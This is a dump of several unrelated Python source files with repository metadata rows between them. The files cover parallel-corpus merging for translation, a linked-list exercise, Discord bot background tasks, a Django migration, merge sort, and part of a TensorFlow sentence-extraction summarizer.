for src_line, tgt_line in zip(open(_src_file_address),
open(_tgt_file_address)):
line_no += 1
try:
assert src_line != "" and tgt_line != ""
except AssertionError:
print("Empty line found in {0}, {1} at line {2}.".
format(_src_file_address, _tgt_file_address, line_no))
try:
assert _num_lines_src == _num_lines_tgt
except AssertionError:
print("Before reading dataset testing lines equality.")
print("num_lines_src :", _num_lines_src)
print("num_lines_tgt :", _num_lines_tgt)
print("Total loss :", abs(_num_lines_src - _num_lines_tgt))
raise
return _num_lines_src, _num_lines_tgt
def assert_check_after(_num_lines_src,
_num_lines_tgt,
_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
parallel_file=1,
skipped_lines=0):
if parallel_file:
num_lines_src_output = sum(1 for _ in open(_dummy_output_file_address_src))
num_lines_tgt_output = sum(1 for _ in open(_dummy_output_file_address_tgt))
try:
assert num_lines_src_output == num_lines_tgt_output == \
_tot_num_of_line + _num_lines_src - skipped_lines
except AssertionError:
print("Testing after adding lines to output files. (parallel_data=1)")
print("num_lines_src :", _num_lines_src)
print("num_lines_tgt :", _num_lines_tgt)
print("num_lines_src_output :", num_lines_src_output)
print("num_lines_tgt_output :", num_lines_tgt_output)
print("tot_num_of_line :", _tot_num_of_line)
print("_tot_num_of_line + _num_lines_src:", _tot_num_of_line + _num_lines_src)
print("Total loss :", abs(num_lines_src_output - num_lines_tgt_output))
raise
else:
raise Exception("condition for parallel_file == 0 is not implemented in the script")
def assert_check_inside(_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
_cnt):
num_line_src = sum(1 for _ in open(_dummy_output_file_address_src))
num_line_tgt = sum(1 for _ in open(_dummy_output_file_address_tgt))
try:
assert (_tot_num_of_line + _cnt) == num_line_src == num_line_tgt
except AssertionError:
print("tot_num_of_line :", _tot_num_of_line)
print("cnt :", _cnt)
print("num_line_src :", num_line_src)
print("num_line_tgt :", num_line_tgt)
raise
# Converts the unicode file to ascii
def unicode_to_ascii(s):
return ''.join(c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn')
def refine(par_line):
"""
TODO: If there is any pre-processing needed before accumulating all data
:param par_line: a string that will be refined
:return: ret: the refined string
"""
ret = unicode_to_ascii(par_line)
return ret
def write_lines(_src_file_address,
_tgt_file_address,
_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
file_name,
line_id_dict,
read_type="w",
parallel_file=1,
debug=1):
_out_file_ptr_src = open(_dummy_output_file_address_src, read_type)
_out_file_ptr_tgt = open(_dummy_output_file_address_tgt, read_type)
print("\nReading {0} dataset...".format(file_name))
tic = time.time()
cnt = 0
skipped = 0
with open(_src_file_address) as src_file_ptr, \
open(_tgt_file_address) as tgt_file_ptr:
for src_sent, tgt_sent in zip(src_file_ptr, tgt_file_ptr):
src_sent = refine(src_sent)
tgt_sent = refine(tgt_sent)
if parallel_file:
if src_sent not in line_id_dict and tgt_sent not in line_id_dict:
_out_file_ptr_src.write(src_sent)
_out_file_ptr_src.flush()
_out_file_ptr_tgt.write(tgt_sent)
_out_file_ptr_tgt.flush()
cnt += 1
if cnt % 10000 == 0 and debug:
assert_check_inside(_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
cnt)
print("Line number :" if cnt <= 10000 else " ", cnt, end="")
sys.stdout.flush()
line_id_dict.add(src_sent)
line_id_dict.add(tgt_sent)
else:
skipped += 1
else:
raise Exception("condition for parallel_file == 0 is not implemented in the script")
assert_check_inside(_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
cnt)
print("Line number :" if cnt <= 10000 else " ", cnt, end="")
print("")
toc = time.time()
total_time = round(toc - tic, 3)
print("{0} dataset reading time {1}(s)".format(file_name, total_time))
return line_id_dict, skipped
def create_file_path(dir,
dataset_name,
dataset_type,
src_lang,
tgt_lang,
suffix,
verbose):
nmt_str = '.' + src_lang + '-' + tgt_lang + '.' + suffix
_path = os.path.join(dir, dataset_name)
if verbose == 2:
print("\n\tFile path creation for", suffix, "language")
print("\t", "-" * 50)
print("\t", "current_folder :", dir)
print("\t", "datase folder :", dataset_name)
print("\t", "new address :", _path)
__path = os.path.join(_path, dataset_type)
if verbose == 2:
print("\t", "current_folder :", _path)
print("\t", "dataset_type folder :", dataset_type)
print("\t", "new address :", __path)
___path = os.path.join(__path, dataset_name) + '.' +\
dataset_type + nmt_str
if verbose == 2:
print("\t", "current_folder :", __path)
print("\t", "final address :", ___path)
print("\t", "-" * 50)
return ___path
def create_out_file_address(dataset_types,
out_dir,
parallel_file,
verbose,
src_lang,
tgt_lang):
address_dict = {}
dummy_output_file_name = 'dummy'
if parallel_file:
for dataset_type in dataset_types:
out_dir_dt = os.path.join(out_dir, dataset_type)
os.makedirs(out_dir_dt, exist_ok=True)
if verbose == 2:
print(out_dir_dt, "folder created")
dummy_output_file_address_src = os.path.join(out_dir_dt, dummy_output_file_name) +\
'.' + dataset_type + '.' + src_lang + '-' + \
tgt_lang + '.' + src_lang
dummy_output_file_address_tgt = os.path.join(out_dir_dt, dummy_output_file_name) +\
'.' + dataset_type + '.' + src_lang + '-' + \
tgt_lang + '.' + tgt_lang
address_dict[dataset_type] = (dummy_output_file_address_src, dummy_output_file_address_tgt)
if verbose == 2:
print("src", dataset_type, "set address :", dummy_output_file_address_src)
print("tgt", dataset_type, "set address :", dummy_output_file_address_tgt)
else:
raise Exception("condition for parallel_file == 0 is not implemented in the script")
return address_dict
def read_and_write_test(src_num_of_line,
tgt_num_of_line,
ref_num_of_line,
verbose):
try:
if verbose >= 1:
print("\nREAD and WRITE test: testing if there is any reduction or addition"
"for python read and write.")
assert src_num_of_line == ref_num_of_line == tgt_num_of_line
except AssertionError:
print("src_num_of_line (newly read data) :", src_num_of_line)
print("tgt_num_of_line (newly read data) :", tgt_num_of_line)
print("ref_num_of_line (taken from data_set_accumulation() ) :".
format(ref_num_of_line))
raise
if verbose >= 1:
print("Passes the test.\n")
return 0
def total_num_of_line_test(tot_num_of_line, skipped_dict, read_tot_num_of_line, verbose):
for dataset_type, cnt in tot_num_of_line.items():
try:
if verbose >= 1:
print("\nTesting is sum of total number of train, dev and test is same.")
assert read_tot_num_of_line[dataset_type]-skipped_dict[dataset_type] == cnt
except AssertionError:
print("dataset type :", dataset_type)
print("total number of example (newly read):",
read_tot_num_of_line[dataset_type])
print("total number of example (taken from data_set_accumulation() ):",
cnt)
raise
if verbose >= 1:
print("Passed the test.\n")
return 0
def data_set_accumulation(params):
print("Arg values")
print(params)
print("")
all_files = os.listdir(params.dir)
all_files.sort(key=lambda x: x.lower())
dataset_line = {}
params.restrict = list(map(str, params.restrict.split()))
(file_dict,
output_file_name) = retrieve_file_dict(all_files,
params.src_lang,
params.tgt_lang)
os.makedirs(params.out_dir, exist_ok=True)
if params.verbose == 2:
print(params.out_dir, "folder created")
dataset_types = ['dev', 'test', 'train']
dataset_types.sort() # very important to do dev and test at first then train
print("Accumulating dev, test and then train dataset.")
address_dict = create_out_file_address(dataset_types,
params.out_dir,
params.parallel_file,
params.verbose,
params.src_lang,
params.tgt_lang)
tot_num_of_line = {}
skipped_dict = {}
for dataset_type in dataset_types:
tot_num_of_line[dataset_type] = 0
skipped_dict[dataset_type] = 0
dataset_add_list = []
line_id_dict = set()
for dataset_type in dataset_types:
print("\n\nCREATING `{0}` DATASET ...".format(dataset_type))
read_type_flag = 0
for val in file_dict:
print("\n", "#" * 100, "\n", val, " dataset (", dataset_type, ")", "\n", "#" * 100, sep="")
if val in params.restrict:
print("{0} : is manually restricted to read.\n".format(val))
continue
# create file path
# ./params.dir/[alt/ubuntu/os16/...]/[train/dev/test]/[alt/ubuntu/os16/...].en-ms.en
src_file_address = create_file_path(params.dir,
val,
dataset_type,
params.src_lang,
params.tgt_lang,
params.src_lang,
verbose=params.verbose)
if params.verbose >= 1:
print("\t", "src_file_address :", src_file_address)
if os.path.exists(src_file_address):
tgt_file_address = create_file_path(params.dir,
val,
dataset_type,
params.src_lang,
params.tgt_lang,
params.tgt_lang,
verbose=params.verbose)
if params.verbose >= 1:
print("\t", "tgt_file_address :", tgt_file_address)
dataset_add_list.append((src_file_address, tgt_file_address))
if os.path.exists(tgt_file_address):
num_lines_src, num_lines_tgt = assert_check_before(src_file_address,
tgt_file_address)
file_name = val + '.' + dataset_type
print("\n\tTotal number of line in the file {0}: {1}".format(file_name, num_lines_src))
# Write on the combined output file
read_type = "w" if read_type_flag == 0 else "a"
if params.verbose == 1:
print("\tLines will be {0} in".format("written" if read_type == "w" else "appended"))
print("\t\t", address_dict[dataset_type][0])
print("\t\t", address_dict[dataset_type][1])
(line_id_dict,
skipped) = write_lines(src_file_address,
tgt_file_address,
address_dict[dataset_type][0],
address_dict[dataset_type][1],
tot_num_of_line[dataset_type],
file_name,
line_id_dict,
debug=params.debug,
parallel_file=params.parallel_file,
read_type=read_type)
if params.verbose == 1:
print("Total {0} number of lines skipped from {1}-{2} dataset".
format(skipped, val, dataset_type))
read_type_flag = 1
# Check if all the lines have been successfully added.
assert_check_after(num_lines_src,
num_lines_tgt,
address_dict[dataset_type][0],
address_dict[dataset_type][1],
tot_num_of_line[dataset_type],
parallel_file=params.parallel_file,
skipped_lines=skipped)
tot_num_of_line[dataset_type] += num_lines_src-skipped
dataset_line[file_name] = num_lines_src
skipped_dict[dataset_type] += skipped
print("-" * 100)
else:
print("{0} file exists for src language but not for tgt language".
format(src_file_address))
else:
print("{0} file doesn't contain nmt input file naming convension or doesn't exists.".
format(src_file_address))
return (dataset_types,
tot_num_of_line,
skipped_dict,
dataset_line,
dataset_add_list,
output_file_name)
def reporting_read_write_check(params,
tot_num_of_line,
skipped_dict,
dataset_line,
dataset_add_list,
output_file_name):
print("\nReporting and read&write check started.")
print("*" * 100)
read_tot_num_of_line = {}
if params.parallel_file:
raw_tot_line = 0
for dataset_add in dataset_add_list:
language_pair = '.' + params.src_lang + "-" + params.tgt_lang
file_name = os.path.basename(dataset_add[0]).split(language_pair)[0]
dataset_type = file_name.split(".")[1]
src_num_of_line = sum(1 for _ in open(dataset_add[0]))
tgt_num_of_line = sum(1 for _ in open(dataset_add[1]))
read_and_write_test(src_num_of_line,
tgt_num_of_line,
dataset_line[file_name],
params.verbose)
print("Total {0} lines in {1}".format(src_num_of_line, file_name))
if dataset_type not in read_tot_num_of_line:
read_tot_num_of_line[dataset_type] = src_num_of_line
else:
read_tot_num_of_line[dataset_type] += src_num_of_line
raw_tot_line += src_num_of_line
for k, v in skipped_dict.items():
raw_tot_line -= v
# reading train, dev and test from source and current run's variable.
total_num_of_line_test(tot_num_of_line, skipped_dict, read_tot_num_of_line, params.verbose)
read_tot_num_of_line = {}
raw_tot_line_output = 0
for dataset_type in tot_num_of_line:
src_out_address = os.path.join(
os.path.join(params.out_dir, dataset_type),
'dummy') + '.' + dataset_type + '.' + \
params.src_lang + '-' + params.tgt_lang + '.' + \
params.src_lang
tgt_out_address = os.path.join(
os.path.join(params.out_dir, dataset_type),
'dummy') + '.' + dataset_type + '.' + \
params.src_lang + '-' + params.tgt_lang + '.' + \
params.tgt_lang
src_num_of_line = sum(1 for _ in open(src_out_address))
tgt_num_of_line = sum(1 for _ in open(tgt_out_address))
try:
if params.verbose >= 1:
print("\nTesting if number of line in paraller output dataset is same or not.")
assert src_num_of_line == tgt_num_of_line
except AssertionError:
print("src_num_of_line :", src_num_of_line)
print("tgt_num_of_line :", tgt_num_of_line)
raise
if params.verbose >= 1:
print("Test passed.\n")
read_tot_num_of_line[dataset_type] = src_num_of_line
raw_tot_line_output += src_num_of_line
# reading train, dev and test from source and output data variable.
total_num_of_line_test(tot_num_of_line, {'dev': 0, 'test': 0, 'train': 0}, read_tot_num_of_line, params.verbose)
try:
assert raw_tot_line_output == raw_tot_line
except AssertionError:
print("raw_tot_line_output:", raw_tot_line_output)
print("raw_tot_line:", raw_tot_line)
raise
# Rename the file and print the report.
new_folder = os.path.join(params.out_dir, output_file_name)
os.makedirs(new_folder, exist_ok=True)
if params.verbose == 2:
print("new folder created at :", new_folder)
dataset_final_address = []
for dataset_type in tot_num_of_line:
src_out_address = os.path.join(
os.path.join(params.out_dir, dataset_type),
'dummy') + '.' + dataset_type + '.' + \
params.src_lang + '-' + params.tgt_lang + '.' + \
params.src_lang
tgt_out_address = os.path.join(
os.path.join(params.out_dir, dataset_type),
'dummy') + '.' + dataset_type + '.' + \
params.src_lang + '-' + params.tgt_lang + '.' + \
params.tgt_lang
new_src_out_address = os.path.join(new_folder, dataset_type) + \
'.' + params.src_lang + \
'-' + params.tgt_lang + '.' + \
params.src_lang
new_tgt_out_address = os.path.join(new_folder, dataset_type) + \
'.' + params.src_lang + \
'-' + params.tgt_lang + '.' + \
params.tgt_lang
src_cmd = "cp " + src_out_address + " " + new_src_out_address
tgt_cmd = "cp " + tgt_out_address + " " + new_tgt_out_address
os.system(src_cmd)
os.system(tgt_cmd)
id_set = set()
src_ptr = open(new_src_out_address, "r")
tgt_ptr = open(new_tgt_out_address, "r")
for src_line, tgt_line in zip(src_ptr, tgt_ptr):
id_set.add(src_line)
id_set.add(tgt_line)
dataset_final_address.append(((dataset_type, id_set), (new_src_out_address, new_tgt_out_address)))
no_of_line = sum(1 for _ in open(new_src_out_address))
print(new_src_out_address)
print(new_tgt_out_address)
print("Total number of line in {0} : {1}".format(dataset_type, no_of_line))
print("Calculating number of common lines between dev, test and train.")
for itr1, ((dataset_type1, id_set1), (src_add1, tgt_add1)) in enumerate(dataset_final_address):
for itr2, ((dataset_type2, id_set2), (_, _)) in enumerate(dataset_final_address):
if itr1 == itr2:
continue
src_add1_ptr = open(src_add1, "r")
tgt_add1_ptr = open(tgt_add1, "r")
cnt = 0
for src_add1_line, tgt_add1_line in zip(src_add1_ptr, tgt_add1_ptr):
if src_add1_line in id_set2 or tgt_add1_line in id_set2:
cnt += 1
print("Total {0} number of line common between {1} and {2}.".
format(cnt, dataset_type1, dataset_type2))
#################################################
# Start of the script
# TODO: implement condition for parallel_file==0
#################################################
def main():
params = parser.parse_args()
(dataset_types,
tot_num_of_line,
skipped_dict,
dataset_line,
dataset_add_list,
output_file_name) = data_set_accumulation(params)
reporting_read_write_check(params,
tot_num_of_line,
skipped_dict,
dataset_line,
dataset_add_list,
output_file_name)
if __name__ == "__main__":
main()
| [
"sbmaruf@gmail.com"
] | sbmaruf@gmail.com |
e0292d766565f016aa318a8a0a0ef6b6fb9bd40d | 16af32261c036caf4a6ef99efadd1418e7256b47 | /5.3 Include Linked List.py | 274ab0fad924090bc69d60d8d3510632eced4a72 | [] | no_license | pperorin/Data-Struct | 6dc6dcb0237bd11207e08b38c79e6ce0e3ec5ad8 | 32d44ff1735a93608e1e71e11d60277ea5c712ba | refs/heads/master | 2023-03-28T19:32:11.895582 | 2021-03-14T18:54:40 | 2021-03-14T18:54:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,724 | py | class Node:
def __init__(self, item):
self.item = item
self.next = None
def setNext(self, node):
self.next = node
class LinkedList:
def __init__(self):
self.head = None
self.size = 0 #ไม่มี
def __str__(self):
if self.size == 0:
return 'Empty'
else:
s = ''
cur = self.head
for i in range(self.size - 1):
s = s + str(cur.item) + ' '
cur = cur.next
s += str(self.indexOf(self.size - 1).item)
return s
#function -> remove
def isEmpty(self):
return self.size == 0
def getSize(self):
return self.size
def indexOf(self, index):
if index < self.size:
cur = self.head
for i in range(index):
cur = cur.next
return cur
else:
return 'Out of range'
def addHead(self, newHead):#newHead = itemNode
if self.isEmpty():
self.head = Node(newHead)
else:
tmp = Node(newHead)
tmp.setNext(self.head)
self.head = tmp
self.size += 1
def append(self, newNode):
if self.isEmpty():
self.head = Node(newNode)
else:
cur = self.indexOf(self.size - 1)
cur.setNext(Node(newNode))
self.size += 1
def insert(self, newNode, index):
if index == self.size:
self.append(newNode)
elif index == 0:
self.addHead(newNode)
else:
cur = self.indexOf(index - 1)
tmp = cur.next
cur.setNext(Node(newNode))
cur.next.setNext(tmp)
self.size += 1
def index(self, itemCheck):
cur = self.head
count = 0
while cur is not None:
if cur.item == itemCheck:
return count
else:
count += 1
cur = cur.next
return -1
def search(self, item):
index = self.index(item)
if index == -1:
return 'Not Found'
else:
return 'Found'
def remove(self, index):
if index < self.size and index > 0:
cur = self.indexOf(index - 1)
if cur.next.next is not None:
cur.setNext(cur.next.next)
else:
cur.setNext(None)
self.size -= 1
return 'Success'
elif index < self.size and index == 0:
self.head = self.head.next
self.size -= 1
return 'Success'
else:
return 'Out of Range'
def reverse(self):
s = ''
for i in range(self.size - 1,0,-1):
s = s + str(self.indexOf(i).item) + ' '
s += str(self.indexOf(0).item)
return s
inpt=input('Enter Input (L1,L2) : ').split()
L1 = LinkedList()
L2 = LinkedList()
for i in inpt[0].split('->'):
L1.append(i)
for i in inpt[1].split('->'):
L2.addHead(i)
print('L1 : '+str(L1))
print('L2 : ',end='')
for i in inpt[1].split('->'):
print(i+' ',end='')
print()
print('Merge : '+str(L1)+' '+str(L2)) | [
"zentoa@hotmail.co.th"
] | zentoa@hotmail.co.th |
216030e9904e5756b9d914f34643907bfe0329c2 | 1d8f43fa4a16419ced68d1e56c51cc5dbe36a47d | /src/client/tasks/scheduled_async_tasks.py | 0b7f00e1aa97b2a8d3ba7751fe5455bf83044b75 | [
"MIT"
] | permissive | sebveigli/apex_bot | e6ef4fbd95cf1d55c920d8358f46e1c32c138574 | 8c020d026a02b6072ffd8ace40c38872a3a3160f | refs/heads/master | 2022-12-09T16:41:03.723003 | 2019-06-05T20:28:50 | 2019-06-05T20:28:50 | 176,143,755 | 5 | 1 | MIT | 2022-12-08T05:04:51 | 2019-03-17T18:35:31 | Python | UTF-8 | Python | false | false | 2,736 | py | import asyncio
import logging
import threading
import time
logger = logging.getLogger(__name__)
class ScheduledAsyncTasks():
@staticmethod
async def update_client_presence(client):
from discord import Status, Activity, ActivityType
from db import get_server_db
server_count = 0
while True:
logger.debug("Updating presence on Discord")
server_db = get_server_db()
count = server_db.count()
if count != server_count:
logger.debug("Server count changed, updating presence")
server_count = count
message = "{} server{}".format(count, "" if count == 1 else "s")
activity = Activity(name=message, type=ActivityType.listening)
await client.change_presence(status=Status.dnd, activity=activity)
await asyncio.sleep(60)
@staticmethod
async def update_server_prefix_cache(prefix_cache):
from db import get_server_db
while True:
logger.debug("Updating prefix cache")
server_db = get_server_db()
servers = server_db.get_servers()
for _, server in servers.iterrows():
server_id = server['server']
server_prefix = server['prefix']
if server_id not in prefix_cache or prefix_cache.get(server_id) != server_prefix:
logger.debug("Updating prefix cache for server {} with new prefix {}".format(server_id, server_prefix))
prefix_cache[server_id] = server_prefix
await asyncio.sleep(300)
@staticmethod
async def clear_update_history(apex_player_updater):
"""
To prevent the update table getting too big from all the updates, the bot should periodically
clear the updates for all users (who are not actively playing).
This should run once every hour
"""
from db import get_user_db, get_update_db
while True:
while apex_player_updater.running:
await asyncio.sleep(1)
logger.info("Doing cleanup of update table...")
user_db = get_user_db()
update_db = get_update_db()
users = user_db.get_users()
for _, user in users.iterrows():
if user.get('apex'):
if user['apex'].get('state') == 'offline':
logger.debug("Cleaning up user {}".format(user['user']))
update_db.clear_updates(user['user'])
await asyncio.sleep(3600)
@staticmethod
async def update_tournaments(apex_updater):
pass
| [
"seb.veigli@gmail.com"
] | seb.veigli@gmail.com |
45ffaf4426419e33898e073ea47511d7dd5e942c | 632d417159013940d612f7364c2a7c5c88b52a56 | /esign/esign_app/migrations/0011_auto_20180119_1323.py | 1a72ae50f09c5a75f3a94acd9845c1324ab2f88a | [] | no_license | cityking/esign | e553d6197f383fab0435dec5805f140592e2fdfc | f88279e3b7f5800bd5ad3a0bd95ebf494078da4c | refs/heads/master | 2022-11-02T20:12:54.927931 | 2018-02-09T03:02:37 | 2018-02-09T03:02:37 | 120,849,522 | 0 | 0 | null | 2022-10-20T20:28:59 | 2018-02-09T03:07:20 | Python | UTF-8 | Python | false | false | 968 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-01-19 05:23
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('esign_app', '0010_auto_20180119_1322'),
]
operations = [
migrations.AlterField(
model_name='appversion',
name='url',
field=models.CharField(max_length=100, verbose_name='下载地址'),
),
migrations.AlterField(
model_name='myuser',
name='join_date',
field=models.DateTimeField(default=datetime.datetime(2018, 1, 19, 13, 23, 34, 652029), verbose_name='加入时间'),
),
migrations.AlterField(
model_name='sign',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2018, 1, 19, 13, 23, 34, 654114), verbose_name='创建时间'),
),
]
| [
"cityking@citykingdeMacBook-Air.local"
] | cityking@citykingdeMacBook-Air.local |
3c13a9494db50cdb2c1c7cd79a400736ee486249 | 21aaa5f90d02707194caae5d30ed403527c2480f | /tdmerge.py | c0b03dff9ad496b427c11a8894a2c7cf6520dab7 | [] | no_license | Sharmaraunak/Data-structure-with-python | 3de5d4b14fea6d59dbd67a7f83fe59198e50c168 | 72f26a40e76d739f2d24429583bae101eff16e4e | refs/heads/master | 2020-07-15T11:36:29.460059 | 2019-09-02T18:53:18 | 2019-09-02T18:53:18 | 205,553,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,905 | py | '''top down merge-sort is an approach in which we divide the array up until last i.e going down to 1 element while dividing
and then callng merge on arr each single unit one time.
In the mergeSort function:
A array in inputted to be sorted
in other function sort
taken start = 0 and end = len(inputted array)
recurse the array t divide end i.e to one element.
find mid = start+end/2
call the mergerSort function recursively on two halves to divide it further into smaller parts.
now call the merge function with array,start,mid,end
In the merge function:
needs:
1.an extra array with size of start+end
2.2 pointers to point at different halves of array to be merged and 1 for new array
while first pointer is lesser than mid and another is lesser than end
do the comparisons to fill the new array
if left in any one copy whole
put all merged valued in an origial array.
-Raunak Kumar Sharma
'''
#merge function
def merge(input_array,start,mid,end):
arr = []
i,j = start,mid+1
while(i<=mid and j<=end):
print(i,j)
if(input_array[i]<=input_array[j]):
arr.append(input_array[i])
i = i+1
else:
arr.append(input_array[j])
j += 1
while(i<= mid):
arr.append(input_array[i])
i += 1
while(j<=end):
arr.append(input_array[j])
j+=1
i = 0
while start <= end:
input_array[start] = arr[i]
i+=1
start+=1
print(input_array)
def sort(input_array,start,end):
if(start>=end):
return
else:
mid = int((start+end)/2)
sort(input_array,start,mid)
sort(input_array,mid+1,end)
merge(input_array,start,mid,end)
#mergeSort function
def mergeSort(input_array):
start = 0
end = len(input_array)-1
sort(input_array,start,end)
input_array = [6,4,5,3,2,1,7]
mergeSort(input_array)
print(input_array) | [
"sharmaraunak338@gmail.com"
] | sharmaraunak338@gmail.com |
d54eb87aaa650c747b6eee9277a4894af92f7bc3 | c731a6feafa43252c5f7b48362be97e3d90081ae | /gpxster/urls.py | 8114bb66759482b43844c6824abc40454171c09e | [] | no_license | sgarsztka/gpx | d3d268905b67f62c62eb09284127817dea08373b | bd7fb7da134d1398a10e1b684b019e00c8fab6c7 | refs/heads/master | 2023-03-16T09:41:39.340308 | 2021-03-07T18:13:56 | 2021-03-07T18:13:56 | 298,028,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | from django.urls import path
from . import views
urlpatterns = [
# path('login',views.Login.as_view(), name='login'),
# path('',views.Index.as_view(), name='index')
]
| [
"sbl86al.o@gmail.com"
] | sbl86al.o@gmail.com |
30c6eb75e4a08899cecb9c4a70cb6d59442c7695 | 0cfefe9f94e8c2a963872459d24876f55bc908aa | /model_docsum.py | 0ed50a44994d876e46a757bd50fe3872411dd6a8 | [
"BSD-3-Clause"
] | permissive | wjddn803/TeamAlpha | 7b040821e335d1416d60f82b7e62600052a6063f | ea270f80eb78561048f0d39a0ad30e5be10c79c5 | refs/heads/master | 2020-05-03T19:39:56.414555 | 2019-05-07T03:23:02 | 2019-05-07T03:23:02 | 178,788,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52,046 | py | ####################################
# Author: Shashi Narayan
# Date: September 2016
# Project: Document Summarization
# H2020 Summa Project
####################################
"""
Document Summarization Modules and Models
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import variable_scope
import tensorflow.contrib.seq2seq as seq2seq
#from tensorflow.python.ops import seq2seq
from tensorflow.python.ops import math_ops
# from tf.nn import variable_scope
from my_flags import FLAGS
from model_utils import *
### Various types of extractor
def sentence_extractor_nonseqrnn_noatt(sents_ext, encoder_state):
"""Implements Sentence Extractor: No attention and non-sequential RNN
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_state: encoder_state
Returns:
extractor output and logits
"""
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())
# Get RNN output
rnn_extractor_output, _ = simple_rnn(sents_ext, initial_state=encoder_state)
with variable_scope.variable_scope("Reshape-Out"):
rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)
# Get Final logits without softmax
extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
logits = tf.matmul(extractor_output_forlogits, weight) + bias
# logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
return rnn_extractor_output, logits
def sentence_extractor_nonseqrnn_titimgatt(sents_ext, encoder_state, titleimages):
    """Sentence Extractor: non-sequential RNN attending over title/image embeddings.

    Args:
      sents_ext: List of sentence embeddings to label for extraction.
      encoder_state: Final state of the document encoder.
      titleimages: Embeddings of the title and images in the document,
        used as the attention memory.

    Returns:
      Tuple of (extractor output tensor, logits without softmax),
      logits shaped [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size].
    """
    # Projection parameters mapping each RNN output to label logits.
    proj_w = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
    proj_b = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())

    # Attentional RNN over the sentences, attending to title/image embeddings.
    rnn_out, _ = simple_attentional_rnn(sents_ext, titleimages, initial_state=encoder_state)
    with variable_scope.variable_scope("Reshape-Out"):
        rnn_out = reshape_list2tensor(rnn_out, FLAGS.max_doc_length, FLAGS.size)

    # Flatten to 2-D, project to label space, then restore document shape.
    flat_out = tf.reshape(rnn_out, [-1, FLAGS.size])
    logits = tf.matmul(flat_out, proj_w) + proj_b
    logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
    return rnn_out, logits
def sentence_extractor_seqrnn_docatt(sents_ext, encoder_outputs, encoder_state, sents_labels):
    """Sentence Extractor: sequential RNN decoder attending over the encoder outputs.

    Implements the JP-style decoder: at each step the decoder consumes the
    previous sentence embedding (teacher-forced during training via
    sents_labels) and attends over the encoder outputs.

    Args:
      sents_ext: List of sentence embeddings to label for extraction.
      encoder_outputs: Per-step outputs of the document encoder (attention memory).
      encoder_state: Final state of the document encoder.
      sents_labels: Gold sentence labels
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size];
        only used during cross-entropy training.

    Returns:
      Tuple of (extractor outputs, logits without softmax), reshaped back to
      tensors of shape [batch, max_doc_length, 2*FLAGS.size] and
      [batch, max_doc_length, target_label_size] respectively.
    """
    # MLP parameters used inside the decoder; 'h1' takes 2*FLAGS.size because
    # the decoder concatenates RNN output with the attention context.
    weights = {
        'h1': variable_on_cpu('weight_1', [2*FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
        'h2': variable_on_cpu('weight_2', [FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
        'out': variable_on_cpu('weight_out', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
    }
    biases = {
        'b1': variable_on_cpu('bias_1', [FLAGS.size], tf.random_normal_initializer()),
        'b2': variable_on_cpu('bias_2', [FLAGS.size], tf.random_normal_initializer()),
        'out': variable_on_cpu('bias_out', [FLAGS.target_label_size], tf.random_normal_initializer())
    }
    # Shift sents_ext for RNN: step t of the decoder must see sentence t-1.
    with variable_scope.variable_scope("Shift-SentExt"):
        # Create embeddings for a special start symbol (all zeros) and put it
        # in front by shifting the sentence list by one.
        special_tensor = tf.zeros_like(sents_ext[0]) # tf.ones_like(sents_ext[0])
        sents_ext_shifted = [special_tensor] + sents_ext[:-1]
    # Reshape sents_labels for RNN (only used for cross-entropy training).
    with variable_scope.variable_scope("Reshape-Label"):
        # only used for training
        sents_labels = reshape_tensor2list(sents_labels, FLAGS.max_doc_length, FLAGS.target_label_size)
    # Run the sequential attentional decoder (defined in model_utils).
    extractor_outputs, logits = jporg_attentional_seqrnn_decoder(sents_ext_shifted, encoder_outputs, encoder_state, sents_labels, weights, biases)
    # Convert the per-step lists back into tensors; logits carry no softmax.
    with variable_scope.variable_scope("Reshape-Out"):
        logits = reshape_list2tensor(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
        extractor_outputs = reshape_list2tensor(extractor_outputs, FLAGS.max_doc_length, 2*FLAGS.size)
    return extractor_outputs, logits
def policy_network(vocab_embed_variable, document_placeholder, label_placeholder):
    """Build the policy core network.

    Pipeline: word-embedding lookup -> sentence CNN -> document RNN encoder
    -> sentence extractor (variant chosen by FLAGS.attend_encoder and the
    presence of title/image sentences).

    Args:
      vocab_embed_variable: [vocab_size, FLAGS.wordembed_size], embeddings
        without PAD and UNK.
      document_placeholder: [None, (FLAGS.max_doc_length + FLAGS.max_title_length
        + FLAGS.max_image_length), FLAGS.max_sent_length] word ids.
      label_placeholder: Gold labels [None, FLAGS.max_doc_length,
